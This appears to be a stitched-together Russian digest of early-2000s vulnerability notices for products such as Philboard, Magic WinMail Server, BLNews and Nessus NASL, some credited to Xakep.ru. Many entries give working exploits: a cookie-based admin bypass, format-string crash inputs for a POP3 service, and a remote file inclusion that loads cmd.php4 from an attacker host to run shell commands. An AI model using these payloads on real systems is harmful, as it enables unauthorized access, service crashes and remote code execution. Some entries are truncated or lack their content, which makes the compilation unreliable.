1. Пароли в чистом виде: Инфо о юзерах хранится в users.dat в совершенно открытом виде. И если же анонимный аккаунт включен (кстати по дефолту), то весь FTP сервак ставится под угрозу:

ftp://somewhere/program files/pablo's ftp service/users.dat


2. Дефолтовый Анонимный Аккаунт: Аномный аккаунт, стоящий по дефолту, имеет доступ к любой папке и файлу на диске C:.

В самом популярном http-сервере группа iDEFENCE обнаружила уязвимость в функции apr_psprintf() библиотеки APR

Версия: Philboard до версии 1.14
Сайт создателя:

http://www.youngpip.com/philboard.asp

Эксплоит:

1. Лоигинимся к форуму как админ:

Коннектимся к цели на 80 порт, используя ТелНет(SecureCRT)

GET /board/philboard_admin.asp HTTP/1.0
Host: target.com
Cookie: philboard_admin=True;

Новостная система Poster version.two поддерживает многопользовательский режим. Пользователи разделяются на normal и administrator. Данные о пользователях и их привелегиях хранятся в файле mem.php, который обычно имеет следующий вид:

Уязвимость обнаружена в Magic WinMail Server. Удаленный пользователь может аварийно завершить работу почтовой службы.

Уязвимость форматной строки обнаружена в POP3 сервисе. Удаленный пользователь может подключиться к POP3 сервису на 110 TCP порту и послать строку формата вместо имени пользователя и пароля, чтобы аварийно завершить работу сервиса. Пример:

C:>telnet 127.0.0.1 110
+OK alpha Magic Winmail Server 2.3(Build 0402) POP3 ready
user %n
+OK
pass %n
- -ERR authorization failed

Возможно уязвимость может использоваться для выполнения произвольного кода с system привилегиями.

Уязвимость обнаружена в Magic WinMail Server 2.3.

By Xakep.ru

Появнение уязвимости Magic Winmail Server:
C:>telnet 127.0.0.1 110
+OK alpha Magic Winmail Server 2.3(Build 0402)
POP3 ready
user %s
+OK
pass %s
-ERR authorization failed
Connection to host lost.

Корпорация Microsoft выпустила два новых бюллетеня, посвященных проблемам безопасности своих продуктов.

В бюллетене MS03-018 описываются несколько дыр в службе Microsoft Internet Information Services (ISS) версий от 4.0 до 5.1 включительно. Шестая версия ISS уязвимостей не содержит. В зависимости от своего характера, дыры в ISS получили рейтинг от малоопасного (low) до важного (important).

Скриптинговый движок Nessus NASL оказался уязвим. Для использования уязвимости атакующему необходим действительную учетную запись Nessus'а и возможность загрузки плагинов на Nessus сервер (по умолчанию этого нет) или же необходимо заставить пользователя запустить специальный NASL скрипт.
Уязвимость намбер 1 - в функции insstr() - использует отрицательный четвертый аргумент :
$ cat t1.nasl
insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);

Павел П. aka UkR-XblP из UkR Team обнаружил уязвимость в коммерческом персоннал файрволле Privatefirewall 3.0. Privatefirewall помимо функций файрволла обладает функциями интегрированной системы опредления попыток вторжения (IDS).

Уязвимость в BLNews версии 2.1.3 нашел Over G. Уязвимый скрипт admin/objects.inc.php4:

Over G. Уязвимый скрипт admin/objects.inc.php4:

if ($itheme!="blubb")
{ include("$Server[path]/admin/tools.inc.php4"); }
include("$Server[path]/admin/$Server[language_file]");

Разработчики забыли написать include("server.inc.php4") :)

Эксплоит:
admin/objects.inc.php4?Server[path]=http://ATACKER&Server[language_file]=cmd.php4
вместе с
http://ATACKER/admin/tools.inc.php4
http://ATACKER/admin/cmd.php4

естественно с

используем: objects.inc.php4?Server[path]=http://ATACKER&cmd=id;uname -a;pwd;

Патч.
write before line if ($itheme!="blubb")
include("server.inc.php4");